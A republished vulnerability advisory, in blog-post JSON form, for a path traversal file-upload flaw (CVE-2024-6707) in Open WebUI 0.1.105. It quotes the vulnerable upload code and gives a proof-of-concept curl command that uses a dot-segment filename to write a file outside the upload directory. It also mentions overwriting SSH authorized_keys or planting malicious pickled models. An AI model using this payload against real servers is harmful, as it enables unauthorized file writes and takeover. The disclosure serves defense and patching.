{"id":58715,"date":"2024-08-08T19:40:07","date_gmt":"2024-08-08T16:40:07","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/179998\/KL-001-2024-006.txt"},"modified":"2024-08-08T19:40:07","modified_gmt":"2024-08-08T16:40:07","slug":"open-webui-0-1-105-file-upload-path-traversal","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/open-webui-0-1-105-file-upload-path-traversal\/","title":{"rendered":"Open WebUI 0.1.105 File Upload \/ Path Traversal"},"content":{"rendered":"<p>KL-001-2024-006: Open WebUI Arbitrary File Upload + Path Traversal<\/p>\n<p>Title: Open WebUI Arbitrary File Upload + Path Traversal<br \/>Advisory ID: KL-001-2024-006<br \/>Publication Date: 2024.08.D06<br \/>Publication URL: https:\/\/korelogic.com\/Resources\/Advisories\/KL-001-2024-006.txt<\/p>\n<p>1. Vulnerability Details<\/p>\n<p>Affected Vendor: Open WebUI<br \/>Affected Product: Open WebUI<br \/>Affected Version: 0.1.105<br \/>Platform: Debian 12<br \/>CWE Classification: CWE-22: Improper Limitation of a Pathname to a<br \/>Restricted Directory (&#8216;Path Traversal&#8217;),<br \/>CWE-434: Unrestricted Upload of File with Dangerous<br \/>Type<br \/>CVE ID: CVE-2024-6707<\/p>\n<p>2. Vulnerability Description<\/p>\n<p>Attacker controlled files can be uploaded to arbitrary<br \/>locations on the web server&#8217;s filesystem by abusing a<br \/>path traversal vulnerability.<\/p>\n<p>3. Technical Description<\/p>\n<p>When attaching files to a prompt by clicking the<br \/>plus sign (+) on the left of the message input box<br \/>when using the Open WebUI HTTP interface, the file<br \/>is uploaded to a static upload directory.<\/p>\n<p>The name of the file is derived from the original<br \/>HTTP upload request and is not validated or sanitized.<br \/>This allows for users to upload files with names<br \/>containing dot-segments in the file path and traverse<br \/>out of the intended uploads directory. Effectively, users<br \/>can upload files anywhere on the filesystem the<br \/>user running the web server has permission.<\/p>\n<p>This can be visualized by examining the python code<br \/>for the &#8220;\/rag\/api\/v1\/doc&#8221; API route:<\/p>\n<p>@app.post(&#8220;\/doc&#8221;)<br \/>def store_doc(<br \/>collection_name: Optional[str] = Form(None),<br \/>file: UploadFile = File(&#8230;),<br \/>user=Depends(get_current_user),<br \/>):<br \/># &#8220;https:\/\/www.gutenberg.org\/files\/1727\/1727-h\/1727-h.htm&#8221;<\/p>\n<p>print(file.content_type)<br \/>try:<br \/>filename = file.filename<br \/>file_path = f&#8221;{UPLOAD_DIR}\/{filename}&#8221;<br \/>contents = file.file.read()<br \/>with open(file_path, &#8220;wb&#8221;) as f:<br \/>f.write(contents)<br \/>f.close()<\/p>\n<p>The &#8220;file&#8221; variable is a representation of the multipart<br \/>form data contained within the HTTP POST request. The<br \/>&#8220;filename&#8221; variable is derived from the uploaded file name<br \/>and is not validated before writing the file contents<br \/>to disk.<\/p>\n<p>This can be used to upload malicious models. These models<br \/>are often distributed as pickled python objects and can<br \/>be leveraged to execute arbitrary python bytecode once<br \/>deserialized. Alternatively, an attacker can leverage existing<br \/>services, such as SSH, to upload an attacker controlled<br \/>&#8220;authorized_keys&#8221; file to remotely connect to the machine.<\/p>\n<p>4. Mitigation and Remediation Recommendation<\/p>\n<p>This issue was remediated in Open WebUI release v0.1.117 on 2024.04.03.<\/p>\n<p>5. Credit<\/p>\n<p>This vulnerability was discovered by Jaggar Henry and Sean<br \/>Segreti of KoreLogic, Inc.<\/p>\n<p>6. Disclosure Timeline<\/p>\n<p>2024.03.05 &#8211; KoreLogic requests secure communications channel and point<br \/>of contact from OpenWebUI.com via email.<br \/>2024.03.12 &#8211; KoreLogic submits vulnerability details and suggested patch<br \/>to maintainer via Github Security &#8216;Report a vulnerability&#8217;<br \/>web form.<br \/>2024.04.01 &#8211; KoreLogic opens Discussion #1385 via GitHub to request an<br \/>update from the maintainer.<br \/>2024.04.01 &#8211; Maintainer opens a private fork and merges KoreLogic&#8217;s patch.<br \/>2024.04.03 &#8211; Maintainer releases v0.1.117.<br \/>2024.08.06 &#8211; KoreLogic public disclosure.<\/p>\n<p>7. Proof of Concept<\/p>\n<p>Execute the following cURL command:<\/p>\n<p>TARGET_URI=&#8217;https:\/\/redacted.com&#8217;; JWT=&#8217;redacted&#8217;; LOCAL_FILE=&#8217;\/tmp\/file_to_upload.txt&#8217;\\<br \/>curl -H &#8220;Authorization: Bearer $JWT&#8221; -F &#8220;file=$LOCAL_FILE;filename=..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/tmp\/pwned.txt&#8221; <br \/>&#8220;$TARGET_URI\/rag\/api\/v1\/doc&#8221;<\/p>\n<p>Verify the file &#8220;pwned.txt&#8221; exists in the \/tmp\/ directory on<br \/>the machine hosting the web server:<\/p>\n<p>ollama@webserver:~$ cat \/tmp\/pwned.txt<br \/>korelogic<br \/>ollama@webserver:~$<\/p>\n<p>The contents of this advisory are copyright(c) 2024<br \/>KoreLogic, Inc. and are licensed under a Creative Commons<br \/>Attribution Share-Alike 4.0 (United States) License:<br \/>http:\/\/creativecommons.org\/licenses\/by-sa\/4.0\/<\/p>\n<p>KoreLogic, Inc. is a founder-owned and operated company with a<br \/>proven track record of providing security services to entities<br \/>ranging from Fortune 500 to small and mid-sized companies. We<br \/>are a highly skilled team of senior security consultants doing<br \/>by-hand security assessments for the most important networks in<br \/>the U.S. and around the world. We are also developers of various<br \/>tools and resources aimed at helping the security community.<br \/>https:\/\/www.korelogic.com\/about-korelogic.html<\/p>\n<p>Our public vulnerability disclosure policy is available at:<br \/>https:\/\/korelogic.com\/KoreLogic-Public-Vulnerability-Disclosure-Policy<\/p>\n","protected":false},"excerpt":{"rendered":"<p>KL-001-2024-006: Open WebUI Arbitrary File Upload + Path Traversal Title: Open WebUI Arbitrary File Upload + Path TraversalAdvisory ID: KL-001-2024-006Publication Date: 2024.08.D06Publication URL: https:\/\/korelogic.com\/Resources\/Advisories\/KL-001-2024-006.txt 1. Vulnerability Details Affected Vendor: Open WebUIAffected Product: Open WebUIAffected Version: 0.1.105Platform: Debian 12CWE Classification: CWE-22: Improper Limitation of a Pathname to aRestricted Directory (&#8216;Path Traversal&#8217;),CWE-434: Unrestricted Upload of File with &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-58715","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58715","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=58715"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58715\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=58715"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=58715"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=58715"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}